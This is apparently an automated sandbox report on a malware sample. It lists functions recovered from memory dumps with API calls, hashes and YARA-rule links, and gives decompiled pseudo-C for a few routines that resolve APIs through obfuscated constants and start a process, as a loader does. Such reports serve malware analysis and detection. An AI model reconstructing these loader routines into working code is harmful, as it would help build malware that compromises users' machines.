                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E305303, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30530A
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E305314
                                                                                                                          • int.LIBCPMT ref: 6E30532B
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • messages.LIBCPMT ref: 6E30534E
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E305365
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E305385
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305392
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                          • String ID: <=An
                                                                                                                          • API String ID: 958335874-4100119773
                                                                                                                          • Opcode ID: 1e866aa85359bc70f1628647a40ec3733f2c512ed234b703ff01c281ae0d1cde
                                                                                                                          • Instruction ID: e7e3c4896437ff999e07e4bd1089f294472dd11e626bd02765b576e1da477752
                                                                                                                          • Opcode Fuzzy Hash: 1e866aa85359bc70f1628647a40ec3733f2c512ed234b703ff01c281ae0d1cde
                                                                                                                          • Instruction Fuzzy Hash: 2B01AD7A900519EFCF05DBE4C954BFEB77AAF85318F144909E4116B290DFB09E068B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD5F64, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 27%
                                                                                                                          			E04CD5F64(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x4cdd37c; // 0x58b9818
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E04CD3A69(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x4cdc1ac;
				}
				_t46 = E04CD51DA(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E04CD75F6(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x4cdd2e0; // 0xbda5a8
						_t16 = _t75 + 0x4cdeb10; // 0x530025
						 *0x4cdd118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E04CD3A69(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x4cdc1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E04CD75F6(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E04CD4AAB(_v20);
						} else {
							_t66 =  *0x4cdd2e0; // 0xbda5a8
							_t31 = _t66 + 0x4cdec30; // 0x73006d
							 *0x4cdd118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E04CD4AAB(_v12);
				}
				return _v24;
			}




























                                                                                                                          0x04cd5f6c
                                                                                                                          0x04cd5f72
                                                                                                                          0x04cd5f79
                                                                                                                          0x04cd5f7f
                                                                                                                          0x04cd5f83
                                                                                                                          0x04cd5f87
                                                                                                                          0x04cd5f8a
                                                                                                                          0x04cd5f8f
                                                                                                                          0x04cd5f94
                                                                                                                          0x04cd5f96
                                                                                                                          0x04cd5f96
                                                                                                                          0x04cd5f9f
                                                                                                                          0x04cd5fa4
                                                                                                                          0x04cd5fa9
                                                                                                                          0x04cd5faf
                                                                                                                          0x04cd5fb9
                                                                                                                          0x04cd5fc2
                                                                                                                          0x04cd5fc9
                                                                                                                          0x04cd5fe2
                                                                                                                          0x04cd5fe7
                                                                                                                          0x04cd5fec
                                                                                                                          0x04cd5ff5
                                                                                                                          0x04cd5ffe
                                                                                                                          0x04cd600f
                                                                                                                          0x04cd6018
                                                                                                                          0x04cd601c
                                                                                                                          0x04cd6020
                                                                                                                          0x04cd6025
                                                                                                                          0x04cd602a
                                                                                                                          0x04cd602c
                                                                                                                          0x04cd602c
                                                                                                                          0x04cd6036
                                                                                                                          0x04cd603f
                                                                                                                          0x04cd6046
                                                                                                                          0x04cd605e
                                                                                                                          0x04cd6062
                                                                                                                          0x04cd609f
                                                                                                                          0x04cd6064
                                                                                                                          0x04cd6067
                                                                                                                          0x04cd606f
                                                                                                                          0x04cd6080
                                                                                                                          0x04cd608c
                                                                                                                          0x04cd6094
                                                                                                                          0x04cd6098
                                                                                                                          0x04cd6098
                                                                                                                          0x04cd6062
                                                                                                                          0x04cd60a7
                                                                                                                          0x04cd60ac
                                                                                                                          0x04cd60b3

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 04CD5F79
                                                                                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 04CD5FB9
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 04CD5FC2
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 04CD5FC9
                                                                                                                          • lstrlenW.KERNEL32(80000002), ref: 04CD5FD6
                                                                                                                          • lstrlen.KERNEL32(?,00000004), ref: 04CD6036
                                                                                                                          • lstrlen.KERNEL32(?), ref: 04CD603F
                                                                                                                          • lstrlen.KERNEL32(?), ref: 04CD6046
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 04CD604D
                                                                                                                            • Part of subcall function 04CD4AAB: RtlFreeHeap.NTDLL(00000000,00000000,04CD5012,00000000,?,?,00000000), ref: 04CD4AB7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CountFreeHeapTick
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2535036572-0
                                                                                                                          • Opcode ID: 8d8e6c0adc746aa277857789a016268ab71675bdca9302be82ec82cf5a12bf27
                                                                                                                          • Instruction ID: 3192d223f4c58b3c6adedf4bf5c175982fe008aec82a799aab7fa039175ed6bc
                                                                                                                          • Opcode Fuzzy Hash: 8d8e6c0adc746aa277857789a016268ab71675bdca9302be82ec82cf5a12bf27
                                                                                                                          • Instruction Fuzzy Hash: 60415B76E00219FBDF11AFA4CC48A9EBBB6EF44358F054065EE04A7221D735EB11EB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2FE16B, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 78COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 6E2FE172
                                                                                                                          • _Maklocstr.LIBCPMT ref: 6E2FE1DB
                                                                                                                          • _Maklocstr.LIBCPMT ref: 6E2FE1ED
                                                                                                                          • _Maklocchr.LIBCPMT ref: 6E2FE205
                                                                                                                          • _Maklocchr.LIBCPMT ref: 6E2FE215
                                                                                                                          • _Getvals.LIBCPMT ref: 6E2FE237
                                                                                                                            • Part of subcall function 6E2F688C: _Maklocchr.LIBCPMT ref: 6E2F68BB
                                                                                                                            • Part of subcall function 6E2F688C: _Maklocchr.LIBCPMT ref: 6E2F68D1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                          • String ID: 4r6n
                                                                                                                          • API String ID: 3549167292-711905790
                                                                                                                          • Opcode ID: 837c16d7a7af90d9c3a1101e85f5b2cae4f9f0a9dd7780dd858b64ac7931bf62
                                                                                                                          • Instruction ID: 186556f33aad2e1b9461eacc802f8ff3e6df84476799c547b733a461a2a021f5
                                                                                                                          • Opcode Fuzzy Hash: 837c16d7a7af90d9c3a1101e85f5b2cae4f9f0a9dd7780dd858b64ac7931bf62
                                                                                                                          • Instruction Fuzzy Hash: 95215C75C40208EBDB159FE5D884ACEBBADEF04714F00885AF9149F245EB719A45CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E30542D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E305434
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E30543E
                                                                                                                          • int.LIBCPMT ref: 6E305455
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E30548F
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E3054AF
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E3054BC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: D=An
                                                                                                                          • API String ID: 55977855-1525241006
                                                                                                                          • Opcode ID: f2d02751d088fc5530bafc1d3ea4f945ad5b213ae80b85ac661a571c4a5a40c7
                                                                                                                          • Instruction ID: 74c2d2e1ae6932cbc1fc15dca3dddbf66958116285c5ba49b7b224f044fd71fb
                                                                                                                          • Opcode Fuzzy Hash: f2d02751d088fc5530bafc1d3ea4f945ad5b213ae80b85ac661a571c4a5a40c7
                                                                                                                          • Instruction Fuzzy Hash: E601C07A94051EEBCF11DBE4C995AFEB7BAAF41328F140809D4106B290DF709D46C791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E3055EC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E3055F3
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E3055FD
                                                                                                                          • int.LIBCPMT ref: 6E305614
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E30564E
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E30566E
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E30567B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: P=An
                                                                                                                          • API String ID: 55977855-2240975974
                                                                                                                          • Opcode ID: 4194251eed908edce3729ca17fdc3717fb7a8eaf7982b6f81a787f74fa0bb1aa
                                                                                                                          • Instruction ID: 5e0571b6551071106f6e4f4a51418a34c469adc5e149f262c7ef23cce9da7aef
                                                                                                                          • Opcode Fuzzy Hash: 4194251eed908edce3729ca17fdc3717fb7a8eaf7982b6f81a787f74fa0bb1aa
                                                                                                                          • Instruction Fuzzy Hash: 8701C07A94091DDBCF01DBE4C954AEEB77AAF41328F150909D411AB2D0DF7099068791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E305398, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30539F
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E3053A9
                                                                                                                          • int.LIBCPMT ref: 6E3053C0
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3053FA
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E30541A
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305427
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: @=An
                                                                                                                          • API String ID: 55977855-3582706681
                                                                                                                          • Opcode ID: cd005d659a9f3a35fcef470dbd04861d9aa8cff1b3b66f8788596929842ceee5
                                                                                                                          • Instruction ID: 574c7e52f45a66ecb9439c699394dd61d5a86dfd7a4c8c0fb7292664178eb835
                                                                                                                          • Opcode Fuzzy Hash: cd005d659a9f3a35fcef470dbd04861d9aa8cff1b3b66f8788596929842ceee5
                                                                                                                          • Instruction Fuzzy Hash: EB01C07A94051DDBCF11DBE8D854BFEB77AAF41328F240909D4106B280DF709D06CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F78F7, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F78FE
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7908
                                                                                                                          • int.LIBCPMT ref: 6E2F791F
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7959
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7979
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7986
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: |<An
                                                                                                                          • API String ID: 55977855-1857351383
                                                                                                                          • Opcode ID: b0488b939a8d0302058ba56c645e9625194c85893d3d967071d084f750b17d8b
                                                                                                                          • Instruction ID: 4fb8e2a2ca4667527e8595d37e783363e180a3729eb313918e177a42250b77ac
                                                                                                                          • Opcode Fuzzy Hash: b0488b939a8d0302058ba56c645e9625194c85893d3d967071d084f750b17d8b
                                                                                                                          • Instruction Fuzzy Hash: 1501AD7A94051EDBCF01DBE4C954AEEF7BBBF86318F140809D4116B280DF7099078781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E332FB2, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          • _free.LIBCMT ref: 6E3332BF
                                                                                                                          • _free.LIBCMT ref: 6E3332D8
                                                                                                                          • _free.LIBCMT ref: 6E333316
                                                                                                                          • _free.LIBCMT ref: 6E33331F
                                                                                                                          • _free.LIBCMT ref: 6E33332B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorLast
                                                                                                                          • String ID: C
                                                                                                                          • API String ID: 3291180501-1037565863
                                                                                                                          • Opcode ID: 63bcb8ae4a4a2a6f8c24174eff1d4983104a5c3fbafbc700b1acfb031487d10c
                                                                                                                          • Instruction ID: 99ea515e45e12f0c79514554d751a49cbdb8ece6492dd1da196cae82a00036dc
                                                                                                                          • Opcode Fuzzy Hash: 63bcb8ae4a4a2a6f8c24174eff1d4983104a5c3fbafbc700b1acfb031487d10c
                                                                                                                          • Instruction Fuzzy Hash: 4DC16B7590126A9FDB24DF68C898E9DB3B4FF08314F6085EAE859A7354D731AE90CF40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD1000, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 73%
                                                                                                                          			E04CD1000(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E04CD4837(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E04CDA938( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x4cdd298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x4cdd2e0; // 0xbda5a8
					_t18 = _t47 + 0x4cde3b3; // 0x73797325
					_t68 = E04CD2291(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x4cdd2e0; // 0xbda5a8
						_t19 = _t50 + 0x4cde760; // 0x58b8d08
						_t20 = _t50 + 0x4cde0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04CD34C7();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E04CD34C7();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x4cdd270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E04CD4AAB(_t70);
				goto L12;
			}


















                                                                                                                          0x04cd1008
                                                                                                                          0x04cd1008
                                                                                                                          0x04cd1017
                                                                                                                          0x04cd101e
                                                                                                                          0x04cd1023
                                                                                                                          0x04cd1130
                                                                                                                          0x04cd1137
                                                                                                                          0x04cd1137
                                                                                                                          0x04cd1032
                                                                                                                          0x04cd103a
                                                                                                                          0x04cd103d
                                                                                                                          0x04cd1042
                                                                                                                          0x04cd1057
                                                                                                                          0x04cd105d
                                                                                                                          0x04cd105e
                                                                                                                          0x04cd1061
                                                                                                                          0x04cd1067
                                                                                                                          0x04cd106a
                                                                                                                          0x04cd106f
                                                                                                                          0x04cd1077
                                                                                                                          0x04cd1083
                                                                                                                          0x04cd1087
                                                                                                                          0x04cd1117
                                                                                                                          0x04cd108d
                                                                                                                          0x04cd108d
                                                                                                                          0x04cd1092
                                                                                                                          0x04cd1099
                                                                                                                          0x04cd10ad
                                                                                                                          0x04cd10b1
                                                                                                                          0x04cd1100
                                                                                                                          0x04cd10b3
                                                                                                                          0x04cd10b4
                                                                                                                          0x04cd10bb
                                                                                                                          0x04cd10d4
                                                                                                                          0x04cd10d6
                                                                                                                          0x04cd10da
                                                                                                                          0x04cd10e1
                                                                                                                          0x04cd10fb
                                                                                                                          0x04cd10e3
                                                                                                                          0x04cd10ec
                                                                                                                          0x04cd10f1
                                                                                                                          0x04cd10f1
                                                                                                                          0x04cd10e1
                                                                                                                          0x04cd110f
                                                                                                                          0x04cd110f
                                                                                                                          0x04cd1087
                                                                                                                          0x04cd111e
                                                                                                                          0x04cd1127
                                                                                                                          0x04cd112b
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD4837: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04CD101C,?,00000001,?,?,00000000,00000000), ref: 04CD485C
                                                                                                                            • Part of subcall function 04CD4837: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04CD487E
                                                                                                                            • Part of subcall function 04CD4837: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04CD4894
                                                                                                                            • Part of subcall function 04CD4837: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04CD48AA
                                                                                                                            • Part of subcall function 04CD4837: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04CD48C0
                                                                                                                            • Part of subcall function 04CD4837: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04CD48D6
                                                                                                                          • memset.NTDLL ref: 04CD106A
                                                                                                                            • Part of subcall function 04CD2291: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04CD1083,73797325), ref: 04CD22A2
                                                                                                                            • Part of subcall function 04CD2291: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04CD22BC
                                                                                                                          • GetModuleHandleA.KERNEL32(4E52454B,058B8D08,73797325), ref: 04CD10A0
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 04CD10A7
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04CD110F
                                                                                                                            • Part of subcall function 04CD34C7: GetProcAddress.KERNEL32(36776F57,04CD5B13), ref: 04CD34E2
                                                                                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04CD10EC
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04CD10F1
                                                                                                                          • GetLastError.KERNEL32(00000001), ref: 04CD10F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3075724336-0
                                                                                                                          • Opcode ID: 03ecdab4b1ba1918b7f9506b15b7c052398d7f03d7dcbe9821eeeed2a5b8afbf
                                                                                                                          • Instruction ID: 464540c73896cd5417b2a77c860937771594dc94fe3dcdae53e1d2b7c21ee656
                                                                                                                          • Opcode Fuzzy Hash: 03ecdab4b1ba1918b7f9506b15b7c052398d7f03d7dcbe9821eeeed2a5b8afbf
                                                                                                                          • Instruction Fuzzy Hash: 3F316FBAD00209BFDB11AFE4CC88EAEBBB9EB08344F044565E706A7151D734BE44DB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2FE244, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: MaklocchrMaklocstr$H_prolog3_
                                                                                                                          • String ID: 4r6n
                                                                                                                          • API String ID: 2404127365-711905790
                                                                                                                          • Opcode ID: 367dd94f14d977b8e8492b93298f8d1ffa5873ac77cf3629bdb10f370008621a
                                                                                                                          • Instruction ID: 2b2b6961f23717f662e003459fa3f88958a3836592db1f3c2a46ff638e0874b8
                                                                                                                          • Opcode Fuzzy Hash: 367dd94f14d977b8e8492b93298f8d1ffa5873ac77cf3629bdb10f370008621a
                                                                                                                          • Instruction Fuzzy Hash: FD2136B5C40348EBDB14DFE5D884ADEBBB8EF44704F00885AE9159F255EB70DA41CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD1974, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 63%
                                                                                                                          			E04CD1974(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x4cdd2e0; // 0xbda5a8
				_t1 = _t9 + 0x4cde62c; // 0x253d7325
				_t36 = 0;
				_t28 = E04CD43A8(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E04CD75F6(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E04CD5601(_t34, _t41, _a8);
						E04CD4AAB(_t41);
						_t42 = E04CD756E(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04CD4AAB(_t36);
							_t36 = _t42;
						}
						_t43 = E04CD26DD(_t36, _t33);
						if(_t43 != 0) {
							E04CD4AAB(_t36);
							_t36 = _t43;
						}
					}
					E04CD4AAB(_t28);
				}
				return _t36;
			}














                                                                                                                          0x04cd1974
                                                                                                                          0x04cd1977
                                                                                                                          0x04cd1978
                                                                                                                          0x04cd1980
                                                                                                                          0x04cd1987
                                                                                                                          0x04cd198e
                                                                                                                          0x04cd1992
                                                                                                                          0x04cd1998
                                                                                                                          0x04cd199f
                                                                                                                          0x04cd19a4
                                                                                                                          0x04cd19b6
                                                                                                                          0x04cd19ba
                                                                                                                          0x04cd19be
                                                                                                                          0x04cd19c4
                                                                                                                          0x04cd19c9
                                                                                                                          0x04cd19d9
                                                                                                                          0x04cd19db
                                                                                                                          0x04cd19f2
                                                                                                                          0x04cd19f6
                                                                                                                          0x04cd19f9
                                                                                                                          0x04cd19fe
                                                                                                                          0x04cd19fe
                                                                                                                          0x04cd1a07
                                                                                                                          0x04cd1a0b
                                                                                                                          0x04cd1a0e
                                                                                                                          0x04cd1a13
                                                                                                                          0x04cd1a13
